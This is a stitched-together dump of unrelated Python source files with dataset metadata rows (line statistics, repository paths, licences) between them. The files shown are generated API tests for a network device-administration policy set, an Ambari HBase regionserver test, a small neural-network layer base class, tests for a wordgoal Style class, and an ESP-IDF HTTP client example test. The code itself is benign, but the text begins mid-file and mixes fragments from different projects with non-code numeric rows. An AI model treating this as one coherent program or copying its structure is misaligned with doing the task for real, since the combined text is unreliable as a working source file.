        response = get_device_admin_policy_set_by_id(api)
        assert is_valid_get_device_admin_policy_set_by_id(validator, response)
    except Exception as err:
        # Failures are acceptable only as schema or malformed-request errors.
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(err)
            raise err
def get_device_admin_policy_set_by_id_default(api):
    """Fetch by id with the placeholder 'string', default-argument variant."""
    service = api.device_administration_policy_set
    return service.get_device_admin_policy_set_by_id(id='string')
@pytest.mark.device_administration_policy_set
def test_get_device_admin_policy_set_by_id_default(api, validator):
    """Default-argument fetch must validate or fail with a known error type."""
    try:
        response = get_device_admin_policy_set_by_id_default(api)
        assert is_valid_get_device_admin_policy_set_by_id(validator, response)
    except Exception as err:
        # TypeError is tolerated here: defaults may omit required arguments.
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise err
def is_valid_update_device_admin_policy_set_by_id(json_schema_validate, obj):
    """Check that *obj* is a requests-style response matching the JSON schema."""
    if not obj:
        return False
    # The response wrapper must expose the usual REST-response attributes.
    for attr in ('headers', 'content', 'text', 'response'):
        assert hasattr(obj, attr)
    json_schema_validate('jsd_e2c930d3d75859b8b7d30e79f3eab084_v3_0_0').validate(obj.response)
    return True
def update_device_admin_policy_set_by_id(api):
    """Exercise the update-by-id endpoint with a fully populated sample payload."""
    # active_validation is off because the payload uses placeholder values.
    return api.device_administration_policy_set.update_device_admin_policy_set_by_id(
        active_validation=False,
        condition={'conditionType': 'string', 'isNegate': True, 'name': 'string', 'id': 'string', 'description': 'string', 'dictionaryName': 'string', 'attributeName': 'string', 'attributeId': 'string', 'operator': 'string', 'dictionaryValue': 'string', 'attributeValue': 'string', 'children': [{'conditionType': 'string', 'isNegate': True}], 'hoursRange': {'startTime': 'string', 'endTime': 'string'}, 'hoursRangeException': {'startTime': 'string', 'endTime': 'string'}, 'weekDays': ['string'], 'weekDaysException': ['string'], 'datesRange': {'startDate': 'string', 'endDate': 'string'}, 'datesRangeException': {'startDate': 'string', 'endDate': 'string'}},
        default=True,
        description='string',
        hit_counts=0,
        id='string',
        is_proxy=True,
        name='string',
        payload=None,
        rank=0,
        service_name='string',
        state='string'
    )
@pytest.mark.device_administration_policy_set
def test_update_device_admin_policy_set_by_id(api, validator):
    """Updating by id must yield a schema-valid response."""
    try:
        response = update_device_admin_policy_set_by_id(api)
        assert is_valid_update_device_admin_policy_set_by_id(validator, response)
    except Exception as err:
        # Failures are acceptable only as schema or malformed-request errors.
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(err)
            raise err
def update_device_admin_policy_set_by_id_default(api):
    """Update by id with every optional argument left as None."""
    return api.device_administration_policy_set.update_device_admin_policy_set_by_id(
        active_validation=False,
        id='string',
        condition=None,
        default=None,
        description=None,
        hit_counts=None,
        is_proxy=None,
        name=None,
        payload=None,
        rank=None,
        service_name=None,
        state=None
    )
@pytest.mark.device_administration_policy_set
def test_update_device_admin_policy_set_by_id_default(api, validator):
    """Default-argument update must validate or fail with a known error type."""
    try:
        response = update_device_admin_policy_set_by_id_default(api)
        assert is_valid_update_device_admin_policy_set_by_id(validator, response)
    except Exception as err:
        # TypeError is tolerated here: defaults may omit required arguments.
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise err
def is_valid_delete_device_admin_policy_set_by_id(json_schema_validate, obj):
    """Check that *obj* is a requests-style response matching the JSON schema."""
    if not obj:
        return False
    # The response wrapper must expose the usual REST-response attributes.
    for attr in ('headers', 'content', 'text', 'response'):
        assert hasattr(obj, attr)
    json_schema_validate('jsd_b5c6ed4306f059cc963895a04f219d5d_v3_0_0').validate(obj.response)
    return True
def delete_device_admin_policy_set_by_id(api):
    """Delete a policy set using the placeholder id 'string'."""
    service = api.device_administration_policy_set
    return service.delete_device_admin_policy_set_by_id(id='string')
@pytest.mark.device_administration_policy_set
def test_delete_device_admin_policy_set_by_id(api, validator):
    """Deleting by id must yield a schema-valid response."""
    try:
        response = delete_device_admin_policy_set_by_id(api)
        assert is_valid_delete_device_admin_policy_set_by_id(validator, response)
    except Exception as err:
        # Failures are acceptable only as schema or malformed-request errors.
        with pytest.raises((JsonSchemaException, MalformedRequest)):
            print(err)
            raise err
def delete_device_admin_policy_set_by_id_default(api):
    """Delete by id with the placeholder 'string', default-argument variant."""
    service = api.device_administration_policy_set
    return service.delete_device_admin_policy_set_by_id(id='string')
@pytest.mark.device_administration_policy_set
def test_delete_device_admin_policy_set_by_id_default(api, validator):
    """Default-argument delete must validate or fail with a known error type."""
    try:
        response = delete_device_admin_policy_set_by_id_default(api)
        assert is_valid_delete_device_admin_policy_set_by_id(validator, response)
    except Exception as err:
        # TypeError is tolerated here: defaults may omit required arguments.
        with pytest.raises((JsonSchemaException, MalformedRequest, TypeError)):
            raise err
| 36.435185
| 658
| 0.723592
| 1,441
| 11,805
| 5.565579
| 0.142262
| 0.072943
| 0.116584
| 0.109726
| 0.829302
| 0.829302
| 0.82606
| 0.815711
| 0.80611
| 0.777057
| 0
| 0.012892
| 0.191783
| 11,805
| 323
| 659
| 36.547988
| 0.827691
| 0.099788
| 0
| 0.732794
| 0
| 0
| 0.121657
| 0.020245
| 0
| 0
| 0
| 0
| 0.121457
| 1
| 0.101215
| false
| 0
| 0.016194
| 0
| 0.198381
| 0.020243
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c4ca031d808f7a8e999c41e995828aa37a57697
| 192
|
py
|
Python
|
src/core/tests/__init__.py
|
jubra97/speedos
|
dd8b84a0a765ab1d9a635ada44160be8edb9935f
|
[
"MIT"
] | 1
|
2021-04-24T13:40:15.000Z
|
2021-04-24T13:40:15.000Z
|
src/core/tests/__init__.py
|
jubra97/speedos
|
dd8b84a0a765ab1d9a635ada44160be8edb9935f
|
[
"MIT"
] | 1
|
2021-04-01T10:04:15.000Z
|
2021-04-17T10:48:29.000Z
|
src/core/tests/__init__.py
|
jubra97/speedos
|
dd8b84a0a765ab1d9a635ada44160be8edb9935f
|
[
"MIT"
] | null | null | null |
from src.core.tests.test_utils import *
from src.core.tests import *
from src.core.tests.test_model import *
from src.core.tests.test_agents import *
from src.core.tests.test_voronoi import *
| 32
| 41
| 0.796875
| 33
| 192
| 4.515152
| 0.30303
| 0.234899
| 0.369128
| 0.536913
| 0.805369
| 0.52349
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104167
| 192
| 5
| 42
| 38.4
| 0.866279
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7c6d26f5eb9613ac7c3ce90bf2ab8e8010528a4a
| 206
|
py
|
Python
|
cblib/scripts/filters/psdentries.py
|
HFriberg/cblib-base
|
164a00eb73ef3ac61f5b54f30492209cc69b854b
|
[
"Zlib"
] | 3
|
2019-06-13T06:57:31.000Z
|
2020-06-18T09:58:11.000Z
|
cblib/scripts/filters/psdentries.py
|
HFriberg/cblib-base
|
164a00eb73ef3ac61f5b54f30492209cc69b854b
|
[
"Zlib"
] | 1
|
2019-04-27T18:28:57.000Z
|
2019-04-30T17:16:53.000Z
|
cblib/scripts/filters/psdentries.py
|
HFriberg/cblib-base
|
164a00eb73ef3ac61f5b54f30492209cc69b854b
|
[
"Zlib"
] | 3
|
2019-04-30T11:19:34.000Z
|
2019-05-31T13:12:17.000Z
|
import psdvar
import psdmap
def keyquery(cdim=None):
    """Union of the key sets reported by the psdvar and psdmap filters."""
    return psdvar.keyquery(cdim) | psdmap.keyquery(cdim)
def getval(prob, cdim=None):
    """Concatenation of the values reported by psdvar and psdmap for *prob*."""
    return psdvar.getval(prob, cdim) + psdmap.getval(prob, cdim)
| 22.888889
| 63
| 0.737864
| 29
| 206
| 5.241379
| 0.344828
| 0.236842
| 0.276316
| 0.263158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121359
| 206
| 8
| 64
| 25.75
| 0.839779
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
7c71004e11436d245af9c58c3ee97b3095e965a2
| 12,438
|
py
|
Python
|
ambari-server/src/test/python/stacks/2.0.6/HBASE/test_hbase_regionserver.py
|
wbear2/ambari
|
a1891193984da47015cd5483b5b95e040677d7df
|
[
"Apache-2.0"
] | 5
|
2018-06-03T05:19:40.000Z
|
2021-04-16T17:10:49.000Z
|
ambari-server/src/test/python/stacks/2.0.6/HBASE/test_hbase_regionserver.py
|
wbear2/ambari
|
a1891193984da47015cd5483b5b95e040677d7df
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.0.6/HBASE/test_hbase_regionserver.py
|
wbear2/ambari
|
a1891193984da47015cd5483b5b95e040677d7df
|
[
"Apache-2.0"
] | 6
|
2019-05-07T13:24:39.000Z
|
2021-02-15T14:12:37.000Z
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from mock.mock import MagicMock, patch
from stacks.utils.RMFTestCase import *
@patch("os.path.exists", new = MagicMock(return_value=True))
class TestHbaseRegionServer(RMFTestCase):
    def test_configure_default(self):
        # 'configure' with the stock (non-secured) config: only the shared
        # configure resources are expected, no daemon start/stop.
        self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
                           classname = "HbaseRegionServer",
                           command = "configure",
                           config_file="default.json"
                           )
        self.assert_configure_default()
        # The script must declare nothing beyond the asserted resources.
        self.assertNoMoreResources()
    def test_start_default(self):
        # 'start' first performs the full configure, then launches the daemon.
        self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
                           classname = "HbaseRegionServer",
                           command = "start",
                           config_file="default.json"
                           )
        self.assert_configure_default()
        # Daemon start is guarded by a pid-file/process liveness check (not_if).
        self.assertResourceCalled('Execute', '/usr/lib/hbase/bin/hbase-daemon.sh --config /etc/hbase/conf start regionserver',
                                  not_if = 'ls /var/run/hbase/hbase-hbase-regionserver.pid >/dev/null 2>&1 && ps `cat /var/run/hbase/hbase-hbase-regionserver.pid` >/dev/null 2>&1',
                                  user = 'hbase'
                                  )
        self.assertNoMoreResources()
    def test_stop_default(self):
        # 'stop' does not re-run configure; it stops the daemon with a timeout
        # plus a kill -9 fallback, then removes the stale pid file.
        self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
                           classname = "HbaseRegionServer",
                           command = "stop",
                           config_file="default.json"
                           )
        self.assertResourceCalled('Execute', '/usr/lib/hbase/bin/hbase-daemon.sh --config /etc/hbase/conf stop regionserver',
                                  user = 'hbase',
                                  on_timeout = 'ls /var/run/hbase/hbase-hbase-regionserver.pid >/dev/null 2>&1 && ps `cat /var/run/hbase/hbase-hbase-regionserver.pid` >/dev/null 2>&1 && kill -9 `cat /var/run/hbase/hbase-hbase-regionserver.pid`',
                                  timeout = 30,
                                  )
        self.assertResourceCalled('Execute', 'rm -f /var/run/hbase/hbase-hbase-regionserver.pid',
                                  )
        self.assertNoMoreResources()
    def test_configure_secured(self):
        # 'configure' with the secured (kerberized) config: only the shared
        # secure configure resources are expected, no daemon start/stop.
        self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
                           classname = "HbaseRegionServer",
                           command = "configure",
                           config_file="secured.json"
                           )
        self.assert_configure_secured()
        # The script must declare nothing beyond the asserted resources.
        self.assertNoMoreResources()
    def test_start_secured(self):
        # Secured 'start': full secure configure, then the daemon launch.
        self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
                           classname = "HbaseRegionServer",
                           command = "start",
                           config_file="secured.json"
                           )
        self.assert_configure_secured()
        # Daemon start is guarded by a pid-file/process liveness check (not_if).
        self.assertResourceCalled('Execute', '/usr/lib/hbase/bin/hbase-daemon.sh --config /etc/hbase/conf start regionserver',
                                  not_if = 'ls /var/run/hbase/hbase-hbase-regionserver.pid >/dev/null 2>&1 && ps `cat /var/run/hbase/hbase-hbase-regionserver.pid` >/dev/null 2>&1',
                                  user = 'hbase',
                                  )
        self.assertNoMoreResources()
    def test_stop_secured(self):
        # Secured 'stop': identical to the default stop sequence — timeout with
        # kill -9 fallback, then pid-file cleanup.
        self.executeScript("2.0.6/services/HBASE/package/scripts/hbase_regionserver.py",
                           classname = "HbaseRegionServer",
                           command = "stop",
                           config_file="secured.json"
                           )
        self.assertResourceCalled('Execute', '/usr/lib/hbase/bin/hbase-daemon.sh --config /etc/hbase/conf stop regionserver',
                                  user = 'hbase',
                                  on_timeout = 'ls /var/run/hbase/hbase-hbase-regionserver.pid >/dev/null 2>&1 && ps `cat /var/run/hbase/hbase-hbase-regionserver.pid` >/dev/null 2>&1 && kill -9 `cat /var/run/hbase/hbase-hbase-regionserver.pid`',
                                  timeout = 30,
                                  )
        self.assertResourceCalled('Execute', 'rm -f /var/run/hbase/hbase-hbase-regionserver.pid',
                                  )
        self.assertNoMoreResources()
    def assert_configure_default(self):
        # Shared assertions for every non-secured command. assertResourceCalled
        # consumes declared resources in order, so the sequence below must match
        # the script's declaration order exactly.
        # NOTE: mode values 0775/0644/0711 are Python 2 octal literals.
        self.assertResourceCalled('Directory', '/etc/hbase/conf',
                                  owner = 'hbase',
                                  group = 'hadoop',
                                  recursive = True,
                                  )
        self.assertResourceCalled('Directory', '/hadoop/hbase',
                                  owner = 'hbase',
                                  recursive = True,
                                  )
        self.assertResourceCalled('Directory', '/hadoop/hbase/local/jars',
                                  owner = 'hbase',
                                  group = 'hadoop',
                                  mode=0775,
                                  recursive = True,
                                  )
        # XML configs rendered from the test's JSON config blob.
        self.assertResourceCalled('XmlConfig', 'hbase-site.xml',
                                  owner = 'hbase',
                                  group = 'hadoop',
                                  conf_dir = '/etc/hbase/conf',
                                  configurations = self.getConfig()['configurations']['hbase-site'], # don't hardcode all the properties
                                  )
        self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
                                  owner = 'hbase',
                                  group = 'hadoop',
                                  conf_dir = '/etc/hbase/conf',
                                  configurations = self.getConfig()['configurations']['hdfs-site'], # don't hardcode all the properties
                                  )
        # hdfs-site is written a second time into the hadoop conf dir, owned by hdfs.
        self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
                                  owner = 'hdfs',
                                  group = 'hadoop',
                                  conf_dir = '/etc/hadoop/conf',
                                  configurations = self.getConfig()['configurations']['hdfs-site'], # don't hardcode all the properties
                                  )
        self.assertResourceCalled('File', '/etc/hbase/conf/hbase-policy.xml',
                                  owner = 'hbase',
                                  group = 'hadoop',
                                  )
        # Templated config files (template_tag selects a template variant).
        self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/hbase-env.sh',
                                  owner = 'hbase',
                                  template_tag = None,
                                  )
        self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/hadoop-metrics2-hbase.properties',
                                  owner = 'hbase',
                                  template_tag = 'GANGLIA-RS',
                                  )
        self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/regionservers',
                                  owner = 'hbase',
                                  template_tag = None,
                                  )
        # Runtime pid/log directories.
        self.assertResourceCalled('Directory', '/var/run/hbase',
                                  owner = 'hbase',
                                  recursive = True,
                                  )
        self.assertResourceCalled('Directory', '/var/log/hbase',
                                  owner = 'hbase',
                                  recursive = True,
                                  )
        self.assertResourceCalled('File',
                                  '/etc/hbase/conf/log4j.properties',
                                  mode=0644,
                                  group='hadoop',
                                  owner='hbase',
                                  content='log4jproperties\nline2'
                                  )
        # HDFS directories are declared with 'create_delayed' and then flushed
        # by the final 'create' action.
        self.assertResourceCalled('HdfsDirectory', 'hdfs://c6401.ambari.apache.org:8020/apps/hbase/data',
                                  security_enabled = False,
                                  keytab = UnknownConfigurationMock(),
                                  conf_dir = '/etc/hadoop/conf',
                                  hdfs_user = 'hdfs',
                                  kinit_path_local = '/usr/bin/kinit',
                                  owner = 'hbase',
                                  action = ['create_delayed'],
                                  )
        self.assertResourceCalled('HdfsDirectory', '/apps/hbase/staging',
                                  security_enabled = False,
                                  keytab = UnknownConfigurationMock(),
                                  conf_dir = '/etc/hadoop/conf',
                                  hdfs_user = 'hdfs',
                                  kinit_path_local = '/usr/bin/kinit',
                                  mode = 0711,
                                  owner = 'hbase',
                                  action = ['create_delayed'],
                                  )
        self.assertResourceCalled('HdfsDirectory', None,
                                  security_enabled = False,
                                  keytab = UnknownConfigurationMock(),
                                  conf_dir = '/etc/hadoop/conf',
                                  hdfs_user = 'hdfs',
                                  kinit_path_local = '/usr/bin/kinit',
                                  action = ['create'],
                                  )
def assert_configure_secured(self):
    """Assert the exact resource sequence produced when configuring a
    security-enabled HBase RegionServer.

    With security on, every HdfsDirectory resource carries the headless
    keytab and kinit path, and an extra JAAS template is rendered for the
    regionserver. The checks appear in the same order the service script
    is expected to create the resources.
    """
    # Local config/data directories owned by the hbase user.
    self.assertResourceCalled('Directory', '/etc/hbase/conf',
        owner = 'hbase',
        group = 'hadoop',
        recursive = True,
    )
    self.assertResourceCalled('Directory', '/hadoop/hbase',
        owner = 'hbase',
        recursive = True,
    )
    self.assertResourceCalled('Directory', '/hadoop/hbase/local/jars',
        owner = 'hbase',
        group = 'hadoop',
        mode=0775,
        recursive = True,
    )
    # XML configs: hbase-site in the hbase conf dir, and hdfs-site rendered
    # into BOTH conf dirs (hbase-owned copy and hdfs-owned copy).
    self.assertResourceCalled('XmlConfig', 'hbase-site.xml',
        owner = 'hbase',
        group = 'hadoop',
        conf_dir = '/etc/hbase/conf',
        configurations = self.getConfig()['configurations']['hbase-site'], # don't hardcode all the properties
    )
    self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
        owner = 'hbase',
        group = 'hadoop',
        conf_dir = '/etc/hbase/conf',
        configurations = self.getConfig()['configurations']['hdfs-site'], # don't hardcode all the properties
    )
    self.assertResourceCalled('XmlConfig', 'hdfs-site.xml',
        owner = 'hdfs',
        group = 'hadoop',
        conf_dir = '/etc/hadoop/conf',
        configurations = self.getConfig()['configurations']['hdfs-site'], # don't hardcode all the properties
    )
    self.assertResourceCalled('File', '/etc/hbase/conf/hbase-policy.xml',
        owner = 'hbase',
        group = 'hadoop',
    )
    # Templated configs; metrics file uses the 'GANGLIA-RS' tagged template.
    self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/hbase-env.sh',
        owner = 'hbase',
        template_tag = None,
    )
    self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/hadoop-metrics2-hbase.properties',
        owner = 'hbase',
        template_tag = 'GANGLIA-RS',
    )
    self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/regionservers',
        owner = 'hbase',
        template_tag = None,
    )
    # Secured-only resource: the regionserver JAAS configuration.
    self.assertResourceCalled('TemplateConfig', '/etc/hbase/conf/hbase_regionserver_jaas.conf',
        owner = 'hbase',
        template_tag = None,
    )
    self.assertResourceCalled('Directory', '/var/run/hbase',
        owner = 'hbase',
        recursive = True,
    )
    self.assertResourceCalled('Directory', '/var/log/hbase',
        owner = 'hbase',
        recursive = True,
    )
    self.assertResourceCalled('File',
        '/etc/hbase/conf/log4j.properties',
        mode=0644,
        group='hadoop',
        owner='hbase',
        content='log4jproperties\nline2'
    )
    # HDFS directories are queued with 'create_delayed' and flushed by the
    # final 'create'; security_enabled=True adds keytab + kinit settings.
    self.assertResourceCalled('HdfsDirectory', 'hdfs://c6401.ambari.apache.org:8020/apps/hbase/data',
        security_enabled = True,
        keytab = '/etc/security/keytabs/hdfs.headless.keytab',
        conf_dir = '/etc/hadoop/conf',
        hdfs_user = 'hdfs',
        kinit_path_local = '/usr/bin/kinit',
        owner = 'hbase',
        action = ['create_delayed'],
    )
    self.assertResourceCalled('HdfsDirectory', '/apps/hbase/staging',
        security_enabled = True,
        keytab = '/etc/security/keytabs/hdfs.headless.keytab',
        conf_dir = '/etc/hadoop/conf',
        hdfs_user = 'hdfs',
        kinit_path_local = '/usr/bin/kinit',
        mode = 0711,
        owner = 'hbase',
        action = ['create_delayed'],
    )
    self.assertResourceCalled('HdfsDirectory', None,
        security_enabled = True,
        keytab = '/etc/security/keytabs/hdfs.headless.keytab',
        conf_dir = '/etc/hadoop/conf',
        hdfs_user = 'hdfs',
        kinit_path_local = '/usr/bin/kinit',
        action = ['create'],
    )
| 42.02027
| 218
| 0.568419
| 1,197
| 12,438
| 5.831245
| 0.163743
| 0.134097
| 0.036103
| 0.027507
| 0.876361
| 0.8649
| 0.8649
| 0.864183
| 0.864183
| 0.841834
| 0
| 0.010665
| 0.30648
| 12,438
| 295
| 219
| 42.162712
| 0.798516
| 0.018009
| 0
| 0.773077
| 0
| 0.030769
| 0.325848
| 0.149249
| 0
| 0
| 0
| 0
| 0.196154
| 0
| null | null | 0
| 0.007692
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7cc6dc8673b28672bfe9478805260b1e39f378ab
| 175
|
py
|
Python
|
training_scripts/layers/layer.py
|
Rufaim/Ranker-Net
|
a3100d7c5b0b51ad764abb8025f299be29b2f688
|
[
"MIT"
] | null | null | null |
training_scripts/layers/layer.py
|
Rufaim/Ranker-Net
|
a3100d7c5b0b51ad764abb8025f299be29b2f688
|
[
"MIT"
] | null | null | null |
training_scripts/layers/layer.py
|
Rufaim/Ranker-Net
|
a3100d7c5b0b51ad764abb8025f299be29b2f688
|
[
"MIT"
] | null | null | null |
class Layer(object):
    """Abstract base class for network layers.

    Concrete layers must override both hooks below; the base versions
    only raise.
    """

    def __call__(self, *args, **kwargs):
        # Forward pass — must be provided by the subclass.
        raise NotImplementedError("not implemented")

    def to_json(self, sess):
        # Serialization hook — must be provided by the subclass.
        raise NotImplementedError("not implemented")
| 35
| 46
| 0.771429
| 21
| 175
| 6.190476
| 0.714286
| 0.369231
| 0.415385
| 0.584615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097143
| 175
| 5
| 47
| 35
| 0.822785
| 0
| 0
| 0.4
| 0
| 0
| 0.170455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
7cce28afec3d7fef41f3d6cc18fe33b6fe4ba206
| 2,819
|
py
|
Python
|
tests/config/test_style.py
|
cariad/wordgoal
|
46478f176e1947443107bc8eb2aa254b9c569d2d
|
[
"MIT"
] | null | null | null |
tests/config/test_style.py
|
cariad/wordgoal
|
46478f176e1947443107bc8eb2aa254b9c569d2d
|
[
"MIT"
] | 4
|
2021-03-14T18:05:56.000Z
|
2021-03-16T14:41:32.000Z
|
tests/config/test_style.py
|
cariad/wordgoal
|
46478f176e1947443107bc8eb2aa254b9c569d2d
|
[
"MIT"
] | null | null | null |
from pytest import mark
from wordgoal.config import Style
@mark.parametrize(
    "style, expect",
    [
        # No value anywhere: defaults to True.
        (Style(parent=None, values=None), True),
        # Only the parent sets a value: inherited.
        (Style(parent=Style(parent=None, values={"color": True}), values=None), True),
        (Style(parent=Style(parent=None, values={"color": False}), values=None), False),
        # Local value overrides the parent's.
        (Style(parent=Style(parent=None, values={"color": False}), values={"color": True}), True),
        (Style(parent=Style(parent=None, values={"color": True}), values={"color": False}), False),
    ],
)
def test_color(style: Style, expect: int) -> None:
    """`color` resolves local values before parent values, defaulting to True."""
    assert style.color == expect
@mark.parametrize(
    "style, expect",
    [
        # No value anywhere: defaults to True.
        (Style(parent=None, values=None), True),
        # Only the parent sets a value: inherited.
        (Style(parent=Style(parent=None, values={"fractions": True}), values=None), True),
        (Style(parent=Style(parent=None, values={"fractions": False}), values=None), False),
        # Local value overrides the parent's.
        (Style(parent=Style(parent=None, values={"fractions": False}), values={"fractions": True}), True),
        (Style(parent=Style(parent=None, values={"fractions": True}), values={"fractions": False}), False),
    ],
)
def test_fractions(style: Style, expect: int) -> None:
    """`fractions` resolves local values before parent values, defaulting to True."""
    assert style.fractions == expect
@mark.parametrize(
    "style, expect",
    [
        # No value anywhere: defaults to False (unlike color/fractions).
        (Style(parent=None, values=None), False),
        # Only the parent sets a value: inherited.
        (Style(parent=Style(parent=None, values={"percentages": True}), values=None), True),
        (Style(parent=Style(parent=None, values={"percentages": False}), values=None), False),
        # Local value overrides the parent's.
        (Style(parent=Style(parent=None, values={"percentages": False}), values={"percentages": True}), True),
        (Style(parent=Style(parent=None, values={"percentages": True}), values={"percentages": False}), False),
    ],
)
def test_percentages(style: Style, expect: int) -> None:
    """`percentages` resolves local values before parent values, defaulting to False."""
    assert style.percentages == expect
| 23.889831
| 73
| 0.41646
| 213
| 2,819
| 5.497653
| 0.098592
| 0.253629
| 0.192143
| 0.269001
| 0.824082
| 0.824082
| 0.824082
| 0.736977
| 0.723313
| 0.628523
| 0
| 0
| 0.45016
| 2,819
| 117
| 74
| 24.094017
| 0.755484
| 0
| 0
| 0.7
| 0
| 0
| 0.067045
| 0
| 0
| 0
| 0
| 0
| 0.027273
| 1
| 0.027273
| false
| 0
| 0.018182
| 0
| 0.045455
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7ce194c2663dce569c1bd6fae0a4a937f5c96a8a
| 3,658
|
py
|
Python
|
examples/protocols/esp_http_client/esp_http_client_test.py
|
DCNick3/esp-idf
|
b0150615dff529662772a60dcb57d5b559f480e2
|
[
"Apache-2.0"
] | 2
|
2020-02-14T07:14:41.000Z
|
2020-03-03T09:37:20.000Z
|
examples/protocols/esp_http_client/esp_http_client_test.py
|
DCNick3/esp-idf
|
b0150615dff529662772a60dcb57d5b559f480e2
|
[
"Apache-2.0"
] | null | null | null |
examples/protocols/esp_http_client/esp_http_client_test.py
|
DCNick3/esp-idf
|
b0150615dff529662772a60dcb57d5b559f480e2
|
[
"Apache-2.0"
] | 1
|
2021-01-26T13:40:20.000Z
|
2021-01-26T13:40:20.000Z
|
import re
import os
import ttfw_idf
@ttfw_idf.idf_example_test(env_tag="Example_EthKitV1")
def test_examples_protocol_esp_http_client(env, extra_data):
    """
    steps: |
      1. join AP
      2. Send HTTP request to httpbin.org
    """
    # Run with the default sdkconfig.
    dut1 = env.get_dut("esp_http_client", "examples/protocols/esp_http_client", dut_class=ttfw_idf.ESP32DUT)
    _log_bin_size(dut1)
    _run_http_client_checks(dut1)
    # Re-run the same checks with mbedtls dynamic resource allocation enabled.
    dut1 = env.get_dut("esp_http_client", "examples/protocols/esp_http_client",
                       dut_class=ttfw_idf.ESP32DUT, app_config_name='ssldyn')
    _log_bin_size(dut1)
    _run_http_client_checks(dut1)


def _log_bin_size(dut):
    """Check and log the size of the example's flashed binary (in KB)."""
    binary_file = os.path.join(dut.app.binary_path, "esp-http-client-example.bin")
    bin_size = os.path.getsize(binary_file)
    ttfw_idf.log_performance("esp_http_client_bin_size", "{}KB".format(bin_size // 1024))


def _run_http_client_checks(dut):
    """Boot the app and expect one success line per HTTP method/feature.

    This is the shared assertion sequence for every sdkconfig variant —
    previously duplicated verbatim in the test body.
    """
    dut.start_app()
    dut.expect("Connected to AP, begin http example", timeout=30)
    for feature in ("GET", "POST", "PUT", "PATCH", "DELETE", "HEAD",
                    "Basic Auth", "Basic Auth redirect", "Digest Auth"):
        dut.expect(re.compile(r"HTTP {} Status = 200, content_length = (\d)".format(feature)))
    dut.expect(re.compile(r"HTTPS Status = 200, content_length = (\d)"))
    # content-len for chunked encoding is typically -1, could be a positive length in some cases
    dut.expect(re.compile(r"HTTP chunk encoding Status = 200, content_length = (-?\d)"))
    dut.expect(re.compile(r"HTTP Stream reader Status = 200, content_length = (\d)"))
    dut.expect(re.compile(r"Last esp error code: 0x8001"))
    dut.expect("Finish http example")
